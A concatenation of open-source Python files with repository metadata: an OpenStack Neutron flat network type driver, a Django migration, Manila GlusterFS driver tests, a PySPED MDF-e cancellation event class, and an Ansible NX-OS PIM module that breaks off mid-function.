# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.

from oslo.config import cfg
from oslo.db import exception as db_exc
import sqlalchemy as sa

from neutron.common import exceptions as exc
from neutron.db import model_base
from neutron.openstack.common import log
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2 import driver_api as api

LOG = log.getLogger(__name__)

# Config option controlling which physical networks may carry flat
# segments; '*' is a wildcard that allows any name.
flat_opts = [
    cfg.ListOpt('flat_networks',
                default=[],
                help=_("List of physical_network names with which flat "
                       "networks can be created. Use * to allow flat "
                       "networks with arbitrary physical_network names."))
]

cfg.CONF.register_opts(flat_opts, "ml2_type_flat")


class FlatAllocation(model_base.BASEV2):
    """Represent persistent allocation state of a physical network.

    If a record exists for a physical network, then that physical
    network has been allocated as a flat network.
    """

    __tablename__ = 'ml2_flat_allocations'

    # One row per allocated physical network; the name is the primary key,
    # which enforces "at most one flat segment per physical network".
    physical_network = sa.Column(sa.String(64), nullable=False,
                                 primary_key=True)


class FlatTypeDriver(api.TypeDriver):
    """Manage state for flat networks with ML2.

    The FlatTypeDriver implements the 'flat' network_type. Flat network
    segments provide connectivity between VMs and other devices using
    any connected IEEE 802.1D conformant physical_network, without the
    use of VLAN tags, tunneling, or other segmentation mechanisms.
    Therefore at most one flat network segment can exist on each
    available physical_network.
    """

    def __init__(self):
        self._parse_networks(cfg.CONF.ml2_type_flat.flat_networks)

    def _parse_networks(self, entries):
        """Validate the flat_networks option and cache the allowed names."""
        self.flat_networks = entries
        if '*' in self.flat_networks:
            LOG.info(_("Arbitrary flat physical_network names allowed"))
            # None is used as the wildcard sentinel by
            # validate_provider_segment() below.
            self.flat_networks = None
        elif not all(self.flat_networks):
            msg = _("physical network name is empty")
            raise exc.InvalidInput(error_message=msg)
        else:
            LOG.info(_("Allowable flat physical_network names: %s"),
                     self.flat_networks)

    def get_type(self):
        return p_const.TYPE_FLAT

    def initialize(self):
        LOG.info(_("ML2 FlatTypeDriver initialization complete"))

    def is_partial_segment(self, segment):
        # Flat segments carry no allocatable id, so they are never partial.
        return False

    def validate_provider_segment(self, segment):
        """Reject segments without an allowed physical_network or with
        any extra provider attributes."""
        physical_network = segment.get(api.PHYSICAL_NETWORK)
        if not physical_network:
            msg = _("physical_network required for flat provider network")
            raise exc.InvalidInput(error_message=msg)
        if self.flat_networks and physical_network not in self.flat_networks:
            msg = (_("physical_network '%s' unknown for flat provider network")
                   % physical_network)
            raise exc.InvalidInput(error_message=msg)

        # Python 2 iteritems(); only network_type/physical_network may be set.
        for key, value in segment.iteritems():
            if value and key not in [api.NETWORK_TYPE,
                                     api.PHYSICAL_NETWORK]:
                msg = _("%s prohibited for flat provider network") % key
                raise exc.InvalidInput(error_message=msg)

    def reserve_provider_segment(self, session, segment):
        """Mark the physical network as allocated; the PK constraint turns
        a double allocation into FlatNetworkInUse."""
        physical_network = segment[api.PHYSICAL_NETWORK]
        with session.begin(subtransactions=True):
            try:
                LOG.debug(_("Reserving flat network on physical "
                            "network %s"), physical_network)
                alloc = FlatAllocation(physical_network=physical_network)
                alloc.save(session)
            except db_exc.DBDuplicateEntry:
                raise exc.FlatNetworkInUse(
                    physical_network=physical_network)
        return segment

    def allocate_tenant_segment(self, session):
        # Tenant flat networks are not supported.
        return

    def release_segment(self, session, segment):
        """Delete the allocation row (if any) for the segment's network."""
        physical_network = segment[api.PHYSICAL_NETWORK]
        with session.begin(subtransactions=True):
            count = (session.query(FlatAllocation).
                     filter_by(physical_network=physical_network).
                     delete())
        if count:
            LOG.debug("Releasing flat network on physical network %s",
                      physical_network)
        else:
            LOG.warning(_("No flat network found on physical network %s"),
                        physical_network)
apache-2.0
allo-/django-bingo
bingo/migrations/0006_add_newword.py
1
2231
# -*- coding: utf-8 -*- from django.db import migrations, models import django.db.models.deletion def split_words(apps, schema_editor): Word = apps.get_model("bingo", "Word") BingoField = apps.get_model("bingo", "BingoField") NewWord = apps.get_model("bingo", "NewWord") Site = apps.get_model("sites", "Site") for word in Word.objects.all(): for site in Site.objects.all(): fields = BingoField.objects.filter(word=word, board__game__site=site) if site in word.site.all(): new_word = NewWord(word=word.word, description=word.description, type=word.type, site=site) new_word.save() fields.update(new_word=new_word) elif fields.count() > 0: new_word = NewWord(word=word.word, description=word.description, type=word.type, site=site, enabled=False) new_word.save() fields.update(new_word=new_word) class Migration(migrations.Migration): dependencies = [ ('sites', '0002_alter_domain_unique'), ('bingo', '0005_changed_rating_and_vote'), ] operations = [ migrations.CreateModel( name='NewWord', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('word', models.CharField(max_length=255)), ('description', models.CharField(blank=True, max_length=255)), ('type', models.PositiveSmallIntegerField(choices=[(1, b'Topic'), (2, b'Middle'), (3, b'Meta')])), ('enabled', models.BooleanField(default=True)), ('site', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='sites.Site')), ], options={ 'ordering': ('word',), }, ), migrations.AddField( model_name='bingofield', name='new_word', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='bingo.NewWord'), ), migrations.RunPython(split_words), ]
agpl-3.0
bswartz/manila
manila/tests/share/drivers/test_glusterfs.py
1
19168
# Copyright (c) 2014 Red Hat, Inc. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import copy import socket import ddt import mock from oslo_config import cfg from manila import context from manila import exception from manila.share import configuration as config from manila.share.drivers import ganesha from manila.share.drivers import glusterfs from manila.share.drivers.glusterfs import layout from manila import test from manila.tests import fake_share from manila.tests import fake_utils CONF = cfg.CONF fake_gluster_manager_attrs = { 'export': '127.0.0.1:/testvol', 'host': '127.0.0.1', 'qualified': 'testuser@127.0.0.1:/testvol', 'user': 'testuser', 'volume': 'testvol', 'path_to_private_key': '/fakepath/to/privatekey', 'remote_server_password': 'fakepassword', } fake_share_name = 'fakename' NFS_EXPORT_DIR = 'nfs.export-dir' NFS_EXPORT_VOL = 'nfs.export-volumes' NFS_RPC_AUTH_ALLOW = 'nfs.rpc-auth-allow' NFS_RPC_AUTH_REJECT = 'nfs.rpc-auth-reject' @ddt.ddt class GlusterfsShareDriverTestCase(test.TestCase): """Tests GlusterfsShareDriver.""" def setUp(self): super(GlusterfsShareDriverTestCase, self).setUp() fake_utils.stub_out_utils_execute(self) self._execute = fake_utils.fake_execute self._context = context.get_admin_context() self.addCleanup(fake_utils.fake_execute_set_repliers, []) self.addCleanup(fake_utils.fake_execute_clear_log) CONF.set_default('reserved_share_percentage', 50) CONF.set_default('driver_handles_share_servers', False) self.fake_conf = 
config.Configuration(None) self._driver = glusterfs.GlusterfsShareDriver( execute=self._execute, configuration=self.fake_conf) self.share = fake_share.fake_share(share_proto='NFS') def test_do_setup(self): self.mock_object(self._driver, '_get_helper') self.mock_object(layout.GlusterfsShareDriverBase, 'do_setup') _context = mock.Mock() self._driver.do_setup(_context) self._driver._get_helper.assert_called_once_with() layout.GlusterfsShareDriverBase.do_setup.assert_called_once_with( _context) @ddt.data(True, False) def test_setup_via_manager(self, has_parent): gmgr = mock.Mock() share_mgr_parent = mock.Mock() if has_parent else None nfs_helper = mock.Mock() nfs_helper.get_export = mock.Mock(return_value='host:/vol') self._driver.nfs_helper = mock.Mock(return_value=nfs_helper) ret = self._driver._setup_via_manager( {'manager': gmgr, 'share': self.share}, share_manager_parent=share_mgr_parent) gmgr.set_vol_option.assert_called_once_with( 'nfs.export-volumes', False) self._driver.nfs_helper.assert_called_once_with( self._execute, self.fake_conf, gluster_manager=gmgr) nfs_helper.get_export.assert_called_once_with(self.share) self.assertEqual('host:/vol', ret) @ddt.data({'helpercls': None, 'path': '/fakepath'}, {'helpercls': None, 'path': None}, {'helpercls': glusterfs.GlusterNFSHelper, 'path': '/fakepath'}, {'helpercls': glusterfs.GlusterNFSHelper, 'path': None}) @ddt.unpack def test_setup_via_manager_path(self, helpercls, path): gmgr = mock.Mock() gmgr.path = path if not helpercls: helper = mock.Mock() helper.get_export = mock.Mock(return_value='host:/vol') helpercls = mock.Mock(return_value=helper) self._driver.nfs_helper = helpercls if helpercls == glusterfs.GlusterNFSHelper and path is None: gmgr.get_vol_option = mock.Mock(return_value=True) self._driver._setup_via_manager( {'manager': gmgr, 'share': self.share}) if helpercls == glusterfs.GlusterNFSHelper and path is None: gmgr.get_vol_option.assert_called_once_with( NFS_EXPORT_VOL, boolean=True) args = 
(NFS_RPC_AUTH_REJECT, '*') else: args = (NFS_EXPORT_VOL, False) gmgr.set_vol_option.assert_called_once_with(*args) def test_setup_via_manager_export_volumes_off(self): gmgr = mock.Mock() gmgr.path = None gmgr.get_vol_option = mock.Mock(return_value=False) self._driver.nfs_helper = glusterfs.GlusterNFSHelper self.assertRaises(exception.GlusterfsException, self._driver._setup_via_manager, {'manager': gmgr, 'share': self.share}) gmgr.get_vol_option.assert_called_once_with(NFS_EXPORT_VOL, boolean=True) def test_check_for_setup_error(self): self._driver.check_for_setup_error() def test_update_share_stats(self): self.mock_object(layout.GlusterfsShareDriverBase, '_update_share_stats') self._driver._update_share_stats() (layout.GlusterfsShareDriverBase._update_share_stats. assert_called_once_with({'storage_protocol': 'NFS', 'vendor_name': 'Red Hat', 'share_backend_name': 'GlusterFS', 'reserved_percentage': 50})) def test_get_network_allocations_number(self): self.assertEqual(0, self._driver.get_network_allocations_number()) def test_get_helper(self): ret = self._driver._get_helper() self.assertIsInstance(ret, self._driver.nfs_helper) @ddt.data({'path': '/fakepath', 'helper': glusterfs.GlusterNFSHelper}, {'path': None, 'helper': glusterfs.GlusterNFSVolHelper}) @ddt.unpack def test_get_helper_vol(self, path, helper): self._driver.nfs_helper = glusterfs.GlusterNFSHelper gmgr = mock.Mock(path=path) ret = self._driver._get_helper(gmgr) self.assertIsInstance(ret, helper) @ddt.data('type', 'level') def test_supported_access_features(self, feature): nfs_helper = mock.Mock() supported_access_feature = mock.Mock() setattr(nfs_helper, 'supported_access_%ss' % feature, supported_access_feature) self.mock_object(self._driver, 'nfs_helper', nfs_helper) ret = getattr(self._driver, 'supported_access_%ss' % feature) self.assertEqual(supported_access_feature, ret) def test_update_access_via_manager(self): self.mock_object(self._driver, '_get_helper') gmgr = mock.Mock() add_rules = 
mock.Mock() delete_rules = mock.Mock() self._driver._update_access_via_manager( gmgr, self._context, self.share, add_rules, delete_rules, recovery=True) self._driver._get_helper.assert_called_once_with(gmgr) self._driver._get_helper().update_access.assert_called_once_with( '/', self.share, add_rules, delete_rules, recovery=True) @ddt.ddt class GlusterNFSHelperTestCase(test.TestCase): """Tests GlusterNFSHelper.""" def setUp(self): super(GlusterNFSHelperTestCase, self).setUp() fake_utils.stub_out_utils_execute(self) gluster_manager = mock.Mock(**fake_gluster_manager_attrs) self._execute = mock.Mock(return_value=('', '')) self.fake_conf = config.Configuration(None) self._helper = glusterfs.GlusterNFSHelper( self._execute, self.fake_conf, gluster_manager=gluster_manager) def test_get_export(self): ret = self._helper.get_export(mock.Mock()) self.assertEqual(fake_gluster_manager_attrs['export'], ret) @ddt.data({'output_str': '/foo(10.0.0.1|10.0.0.2),/bar(10.0.0.1)', 'expected': {'foo': ['10.0.0.1', '10.0.0.2'], 'bar': ['10.0.0.1']}}, {'output_str': None, 'expected': {}}) @ddt.unpack def test_get_export_dir_dict(self, output_str, expected): self.mock_object(self._helper.gluster_manager, 'get_vol_option', mock.Mock(return_value=output_str)) ret = self._helper._get_export_dir_dict() self.assertEqual(expected, ret) (self._helper.gluster_manager.get_vol_option. 
assert_called_once_with(NFS_EXPORT_DIR)) @ddt.data({'delta': (['10.0.0.2'], []), 'extra_exports': {}, 'new_exports': '/fakename(10.0.0.1|10.0.0.2)'}, {'delta': (['10.0.0.1'], []), 'extra_exports': {}, 'new_exports': '/fakename(10.0.0.1)'}, {'delta': ([], ['10.0.0.2']), 'extra_exports': {}, 'new_exports': '/fakename(10.0.0.1)'}, {'delta': ([], ['10.0.0.1']), 'extra_exports': {}, 'new_exports': None}, {'delta': ([], ['10.0.0.1']), 'extra_exports': {'elsewhere': ['10.0.1.3']}, 'new_exports': '/elsewhere(10.0.1.3)'}) @ddt.unpack def test_update_access(self, delta, extra_exports, new_exports): gluster_manager_attrs = {'path': '/fakename'} gluster_manager_attrs.update(fake_gluster_manager_attrs) gluster_mgr = mock.Mock(**gluster_manager_attrs) helper = glusterfs.GlusterNFSHelper( self._execute, self.fake_conf, gluster_manager=gluster_mgr) export_dir_dict = {'fakename': ['10.0.0.1']} export_dir_dict.update(extra_exports) helper._get_export_dir_dict = mock.Mock(return_value=export_dir_dict) _share = mock.Mock() add_rules, delete_rules = ( map(lambda a: {'access_to': a}, r) for r in delta) helper.update_access('/', _share, add_rules, delete_rules) helper._get_export_dir_dict.assert_called_once_with() gluster_mgr.set_vol_option.assert_called_once_with(NFS_EXPORT_DIR, new_exports) @ddt.data({}, {'elsewhere': '10.0.1.3'}) def test_update_access_disjoint(self, export_dir_dict): gluster_manager_attrs = {'path': '/fakename'} gluster_manager_attrs.update(fake_gluster_manager_attrs) gluster_mgr = mock.Mock(**gluster_manager_attrs) helper = glusterfs.GlusterNFSHelper( self._execute, self.fake_conf, gluster_manager=gluster_mgr) helper._get_export_dir_dict = mock.Mock(return_value=export_dir_dict) _share = mock.Mock() helper.update_access('/', _share, [], [{'access_to': '10.0.0.2'}]) helper._get_export_dir_dict.assert_called_once_with() self.assertFalse(gluster_mgr.set_vol_option.called) @ddt.ddt class GlusterNFSVolHelperTestCase(test.TestCase): """Tests GlusterNFSVolHelper.""" def 
setUp(self): super(GlusterNFSVolHelperTestCase, self).setUp() fake_utils.stub_out_utils_execute(self) gluster_manager = mock.Mock(**fake_gluster_manager_attrs) self._execute = mock.Mock(return_value=('', '')) self.fake_conf = config.Configuration(None) self._helper = glusterfs.GlusterNFSVolHelper( self._execute, self.fake_conf, gluster_manager=gluster_manager) @ddt.data({'output_str': '10.0.0.1,10.0.0.2', 'expected': ['10.0.0.1', '10.0.0.2']}, {'output_str': None, 'expected': []}) @ddt.unpack def test_get_vol_exports(self, output_str, expected): self.mock_object(self._helper.gluster_manager, 'get_vol_option', mock.Mock(return_value=output_str)) ret = self._helper._get_vol_exports() self.assertEqual(expected, ret) (self._helper.gluster_manager.get_vol_option. assert_called_once_with(NFS_RPC_AUTH_ALLOW)) @ddt.data({'delta': (["10.0.0.1"], []), 'expected': "10.0.0.1,10.0.0.3"}, {'delta': (["10.0.0.2"], []), 'expected': "10.0.0.1,10.0.0.2,10.0.0.3"}, {'delta': ([], ["10.0.0.1"]), 'expected': "10.0.0.3"}, {'delta': ([], ["10.0.0.2"]), 'expected': "10.0.0.1,10.0.0.3"}) @ddt.unpack def test_update_access(self, delta, expected): self.mock_object(self._helper, '_get_vol_exports', mock.Mock( return_value=["10.0.0.1", "10.0.0.3"])) _share = mock.Mock() add_rules, delete_rules = ( map(lambda a: {'access_to': a}, r) for r in delta) self._helper.update_access("/", _share, add_rules, delete_rules) self._helper._get_vol_exports.assert_called_once_with() argseq = [(NFS_RPC_AUTH_ALLOW, expected), (NFS_RPC_AUTH_REJECT, None)] self.assertEqual( [mock.call(*a) for a in argseq], self._helper.gluster_manager.set_vol_option.call_args_list) def test_update_access_empty(self): self.mock_object(self._helper, '_get_vol_exports', mock.Mock( return_value=["10.0.0.1"])) _share = mock.Mock() self._helper.update_access("/", _share, [], [{'access_to': "10.0.0.1"}]) self._helper._get_vol_exports.assert_called_once_with() argseq = [(NFS_RPC_AUTH_ALLOW, None), (NFS_RPC_AUTH_REJECT, "*")] 
self.assertEqual( [mock.call(*a) for a in argseq], self._helper.gluster_manager.set_vol_option.call_args_list) class GaneshaNFSHelperTestCase(test.TestCase): """Tests GaneshaNFSHelper.""" def setUp(self): super(GaneshaNFSHelperTestCase, self).setUp() self.gluster_manager = mock.Mock(**fake_gluster_manager_attrs) self._execute = mock.Mock(return_value=('', '')) self._root_execute = mock.Mock(return_value=('', '')) self.access = fake_share.fake_access() self.fake_conf = config.Configuration(None) self.fake_template = {'key': 'value'} self.share = fake_share.fake_share() self.mock_object(glusterfs.ganesha_utils, 'RootExecutor', mock.Mock(return_value=self._root_execute)) self.mock_object(glusterfs.ganesha.GaneshaNASHelper, '__init__', mock.Mock()) socket.gethostname = mock.Mock(return_value='example.com') self._helper = glusterfs.GaneshaNFSHelper( self._execute, self.fake_conf, gluster_manager=self.gluster_manager) self._helper.tag = 'GLUSTER-Ganesha-localhost' def test_init_local_ganesha_server(self): glusterfs.ganesha_utils.RootExecutor.assert_called_once_with( self._execute) socket.gethostname.assert_has_calls([mock.call()]) glusterfs.ganesha.GaneshaNASHelper.__init__.assert_has_calls( [mock.call(self._root_execute, self.fake_conf, tag='GLUSTER-Ganesha-example.com')]) def test_get_export(self): ret = self._helper.get_export(self.share) self.assertEqual('example.com:/fakename--<access-id>', ret) def test_init_remote_ganesha_server(self): ssh_execute = mock.Mock(return_value=('', '')) CONF.set_default('glusterfs_ganesha_server_ip', 'fakeip') self.mock_object(glusterfs.ganesha_utils, 'SSHExecutor', mock.Mock(return_value=ssh_execute)) glusterfs.GaneshaNFSHelper( self._execute, self.fake_conf, gluster_manager=self.gluster_manager) glusterfs.ganesha_utils.SSHExecutor.assert_called_once_with( 'fakeip', 22, None, 'root', password=None, privatekey=None) glusterfs.ganesha.GaneshaNASHelper.__init__.assert_has_calls( [mock.call(ssh_execute, self.fake_conf, 
tag='GLUSTER-Ganesha-fakeip')]) def test_init_helper(self): ganeshelper = mock.Mock() exptemp = mock.Mock() def set_attributes(*a, **kw): self._helper.ganesha = ganeshelper self._helper.export_template = exptemp self.mock_object(ganesha.GaneshaNASHelper, 'init_helper', mock.Mock(side_effect=set_attributes)) self.assertEqual({}, glusterfs.GaneshaNFSHelper.shared_data) self._helper.init_helper() ganesha.GaneshaNASHelper.init_helper.assert_called_once_with() self.assertEqual(ganeshelper, self._helper.ganesha) self.assertEqual(exptemp, self._helper.export_template) self.assertEqual({ 'GLUSTER-Ganesha-localhost': { 'ganesha': ganeshelper, 'export_template': exptemp}}, glusterfs.GaneshaNFSHelper.shared_data) other_helper = glusterfs.GaneshaNFSHelper( self._execute, self.fake_conf, gluster_manager=self.gluster_manager) other_helper.tag = 'GLUSTER-Ganesha-localhost' other_helper.init_helper() self.assertEqual(ganeshelper, other_helper.ganesha) self.assertEqual(exptemp, other_helper.export_template) def test_default_config_hook(self): fake_conf_dict = {'key': 'value1'} mock_ganesha_utils_patch = mock.Mock() def fake_patch_run(tmpl1, tmpl2): mock_ganesha_utils_patch( copy.deepcopy(tmpl1), tmpl2) tmpl1.update(tmpl2) self.mock_object(glusterfs.ganesha.GaneshaNASHelper, '_default_config_hook', mock.Mock(return_value=self.fake_template)) self.mock_object(glusterfs.ganesha_utils, 'path_from', mock.Mock(return_value='/fakedir/glusterfs/conf')) self.mock_object(self._helper, '_load_conf_dir', mock.Mock(return_value=fake_conf_dict)) self.mock_object(glusterfs.ganesha_utils, 'patch', mock.Mock(side_effect=fake_patch_run)) ret = self._helper._default_config_hook() (glusterfs.ganesha.GaneshaNASHelper._default_config_hook. 
assert_called_once_with()) glusterfs.ganesha_utils.path_from.assert_called_once_with( glusterfs.__file__, 'conf') self._helper._load_conf_dir.assert_called_once_with( '/fakedir/glusterfs/conf') glusterfs.ganesha_utils.patch.assert_called_once_with( self.fake_template, fake_conf_dict) self.assertEqual(fake_conf_dict, ret) def test_fsal_hook(self): self._helper.gluster_manager.path = '/fakename' output = { 'Hostname': '127.0.0.1', 'Volume': 'testvol', 'Volpath': '/fakename' } ret = self._helper._fsal_hook('/fakepath', self.share, self.access) self.assertEqual(output, ret)
apache-2.0
aricaldeira/PySPED
pysped/mdfe/leiaute/evtcancmdfe_300.py
1
4864
# -*- coding: utf-8 -*- # # PySPED - Python libraries to deal with Brazil's SPED Project # # Copyright (C) 2010-2012 # Copyright (C) Aristides Caldeira <aristides.caldeira at tauga.com.br> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Library General Public License as # published by the Free Software Foundation, either version 2.1 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Library General Public License for more details. # # You should have received a copy of the GNU Library General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # PySPED - Bibliotecas Python para o # SPED - Sistema Público de Escrituração Digital # # Copyright (C) 2010-2012 # Copyright (C) Aristides Caldeira <aristides.caldeira arroba tauga.com.br> # # Este programa é um software livre: você pode redistribuir e/ou modificar # este programa sob os termos da licença GNU Library General Public License, # publicada pela Free Software Foundation, em sua versão 2.1 ou, de acordo # com sua opção, qualquer versão posterior. # # Este programa é distribuido na esperança de que venha a ser útil, # porém SEM QUAISQUER GARANTIAS, nem mesmo a garantia implícita de # COMERCIABILIDADE ou ADEQUAÇÃO A UMA FINALIDADE ESPECÍFICA. Veja a # GNU Library General Public License para mais detalhes. # # Você deve ter recebido uma cópia da GNU Library General Public License # juntamente com este programa. 
Caso esse não seja o caso, acesse: # <http://www.gnu.org/licenses/> # from __future__ import division, print_function, unicode_literals import os from pysped.xml_sped import TagCaracter, XMLNFe, NAMESPACE_MDFE from pysped.mdfe.leiaute import ESQUEMA_ATUAL_VERSAO_3 as ESQUEMA_ATUAL from pysped.mdfe.leiaute.eventomdfe_300 import * DIRNAME = os.path.dirname(__file__) class EvCancMDFe(DetEvento): def __init__(self): super(EvCancMDFe, self).__init__() self.descEvento = TagCaracter(nome='descEvento', tamanho=[ 5, 60, 5], raiz='//evCancMDFe', namespace=NAMESPACE_MDFE, namespace_obrigatorio=False, valor='Cancelamento') self.nProt = TagCaracter(nome='nProt' , tamanho=[15, 15, 15], raiz='//evCancMDFe', namespace=NAMESPACE_MDFE, namespace_obrigatorio=False) self.xJust = TagCaracter(nome='xJust' , tamanho=[15, 255] , raiz='//evCancMDFe', namespace=NAMESPACE_MDFE, namespace_obrigatorio=False) def get_xml(self): xml = '<evCancMDFe>' xml += self.descEvento.xml xml += self.nProt.xml xml += self.xJust.xml xml += '</evCancMDFe>' return xml def set_xml(self, arquivo): if self._le_xml(arquivo): self.descEvento.xml = arquivo self.nProt.xml = arquivo self.xJust.xml = arquivo xml = property(get_xml, set_xml) class DetEventoCancMDFe(DetEvento): def __init__(self): super(DetEventoCancMDFe, self).__init__() self.evCancMDFe = EvCancMDFe() def get_xml(self): xml = self.versaoEvento.xml xml += self.evCancMDFe.xml xml += '</detEvento>' return xml def set_xml(self, arquivo): if self._le_xml(arquivo): self.versaoEvento.xml = arquivo self.evCancMDFe.xml = arquivo xml = property(get_xml, set_xml) @property def texto_formatado(self): txt = '<b>Motivo do cancelamento:</b><br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;' + self.evCancMDFe.xJust.valor txt += '<br/><br/>' return txt class InfEventoCancMDFe(InfEvento): def __init__(self): super(InfEventoCancMDFe, self).__init__() self.detEvento = DetEventoCancMDFe() self.tpEvento.valor = '110111' class EventoCancMDFe(Evento): def __init__(self): super(EventoCancMDFe, 
self).__init__() self.infEvento = InfEventoCancMDFe() self.caminho_esquema = os.path.join(DIRNAME, 'schema/', ESQUEMA_ATUAL + '/') self.arquivo_esquema = 'evCancMDFe_v3.00.xsd' class InfEventoRecebidoCancMDFe(InfEventoRecebido): def __init__(self): super(InfEventoRecebidoCancMDFe, self).__init__() class RetEventoCancMDFe(RetEvento): def __init__(self): super(RetEventoCancMDFe, self).__init__() class ProcEventoCancMDFe(ProcEvento): def __init__(self): super(ProcEventoCancMDFe, self).__init__() self.eventoMDFe = EventoCancMDFe() self.retEventoMDFe = RetEventoCancMDFe() self.caminho_esquema = os.path.join(DIRNAME, 'schema', ESQUEMA_ATUAL + '/') self.arquivo_esquema = 'procEventoCancMDFe_v3.00.xsd'
lgpl-2.1
ganeshnalawade/ansible-modules-core
network/nxos/nxos_pim.py
27
9694
#!/usr/bin/python # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # DOCUMENTATION = ''' --- module: nxos_pim version_added: "2.2" short_description: Manages configuration of a PIM instance. description: - Manages configuration of a Protocol Independent Multicast (PIM) instance. author: Gabriele Gerbino (@GGabriele) extends_documentation_fragment: nxos options: ssm_range: description: - Configure group ranges for Source Specific Multicast (SSM). Valid values are multicast addresses or the keyword 'none'. 
required: true ''' EXAMPLES = ''' - nxos_pim: ssm_range: "232.0.0.0/8" username: "{{ un }}" password: "{{ pwd }}" host: "{{ inventory_hostname }}" ''' RETURN = ''' proposed: description: k/v pairs of parameters passed into module returned: verbose mode type: dict sample: {"ssm_range": "232.0.0.0/8"} existing: description: k/v pairs of existing PIM configuration returned: verbose mode type: dict sample: {"ssm_range": none} end_state: description: k/v pairs of BGP configuration after module execution returned: verbose mode type: dict sample: {"ssm_range": "232.0.0.0/8"} updates: description: commands sent to the device returned: always type: list sample: ["ip pim ssm range 232.0.0.0/8"] changed: description: check to see if a change was made on the device returned: always type: boolean sample: true ''' # COMMON CODE FOR MIGRATION import re from ansible.module_utils.basic import get_exception from ansible.module_utils.netcfg import NetworkConfig, ConfigLine from ansible.module_utils.shell import ShellError try: from ansible.module_utils.nxos import get_module except ImportError: from ansible.module_utils.nxos import NetworkModule def to_list(val): if isinstance(val, (list, tuple)): return list(val) elif val is not None: return [val] else: return list() class CustomNetworkConfig(NetworkConfig): def expand_section(self, configobj, S=None): if S is None: S = list() S.append(configobj) for child in configobj.children: if child in S: continue self.expand_section(child, S) return S def get_object(self, path): for item in self.items: if item.text == path[-1]: parents = [p.text for p in item.parents] if parents == path[:-1]: return item def to_block(self, section): return '\n'.join([item.raw for item in section]) def get_section(self, path): try: section = self.get_section_objects(path) return self.to_block(section) except ValueError: return list() def get_section_objects(self, path): if not isinstance(path, list): path = [path] obj = self.get_object(path) if not obj: raise 
ValueError('path does not exist in config') return self.expand_section(obj) def add(self, lines, parents=None): """Adds one or lines of configuration """ ancestors = list() offset = 0 obj = None ## global config command if not parents: for line in to_list(lines): item = ConfigLine(line) item.raw = line if item not in self.items: self.items.append(item) else: for index, p in enumerate(parents): try: i = index + 1 obj = self.get_section_objects(parents[:i])[0] ancestors.append(obj) except ValueError: # add parent to config offset = index * self.indent obj = ConfigLine(p) obj.raw = p.rjust(len(p) + offset) if ancestors: obj.parents = list(ancestors) ancestors[-1].children.append(obj) self.items.append(obj) ancestors.append(obj) # add child objects for line in to_list(lines): # check if child already exists for child in ancestors[-1].children: if child.text == line: break else: offset = len(parents) * self.indent item = ConfigLine(line) item.raw = line.rjust(len(line) + offset) item.parents = ancestors ancestors[-1].children.append(item) self.items.append(item) def get_network_module(**kwargs): try: return get_module(**kwargs) except NameError: return NetworkModule(**kwargs) def get_config(module, include_defaults=False): config = module.params['config'] if not config: try: config = module.get_config() except AttributeError: defaults = module.params['include_defaults'] config = module.config.get_config(include_defaults=defaults) return CustomNetworkConfig(indent=2, contents=config) def load_config(module, candidate): config = get_config(module) commands = candidate.difference(config) commands = [str(c).strip() for c in commands] save_config = module.params['save'] result = dict(changed=False) if commands: if not module.check_mode: try: module.configure(commands) except AttributeError: module.config(commands) if save_config: try: module.config.save_config() except AttributeError: module.execute(['copy running-config startup-config']) result['changed'] = True 
result['updates'] = commands return result # END OF COMMON CODE PARAM_TO_COMMAND_KEYMAP = { 'ssm_range': 'ip pim ssm range' } PARAM_TO_DEFAULT_KEYMAP = {} WARNINGS = [] def invoke(name, *args, **kwargs): func = globals().get(name) if func: return func(*args, **kwargs) def get_value(arg, config, module): REGEX = re.compile(r'(?:{0}\s)(?P<value>.*)$'.format(PARAM_TO_COMMAND_KEYMAP[arg]), re.M) value = '' if PARAM_TO_COMMAND_KEYMAP[arg] in config: value = REGEX.search(config).group('value') return value def get_existing(module, args): existing = {} config = str(get_config(module)) for arg in args: existing[arg] = get_value(arg, config, module) return existing def apply_key_map(key_map, table): new_dict = {} for key, value in table.items(): new_key = key_map.get(key) if new_key: value = table.get(key) if value: new_dict[new_key] = value else: new_dict[new_key] = value return new_dict def get_commands(module, existing, proposed, candidate): commands = list() proposed_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, proposed) existing_commands = apply_key_map(PARAM_TO_COMMAND_KEYMAP, existing) for key, value in proposed_commands.iteritems(): command = '{0} {1}'.format(key, value) commands.append(command) if commands: candidate.add(commands, parents=[]) def main(): argument_spec = dict( ssm_range=dict(required=True, type='str'), m_facts=dict(required=False, default=False, type='bool'), include_defaults=dict(default=False), config=dict(), save=dict(type='bool', default=False) ) module = get_network_module(argument_spec=argument_spec, supports_check_mode=True) splitted_ssm_range = module.params['ssm_range'].split('.') if len(splitted_ssm_range) != 4 and module.params['ssm_range'] != 'none': module.fail_json(msg="Valid ssm_range values are multicast addresses " "or the keyword 'none'.") args = [ 'ssm_range' ] 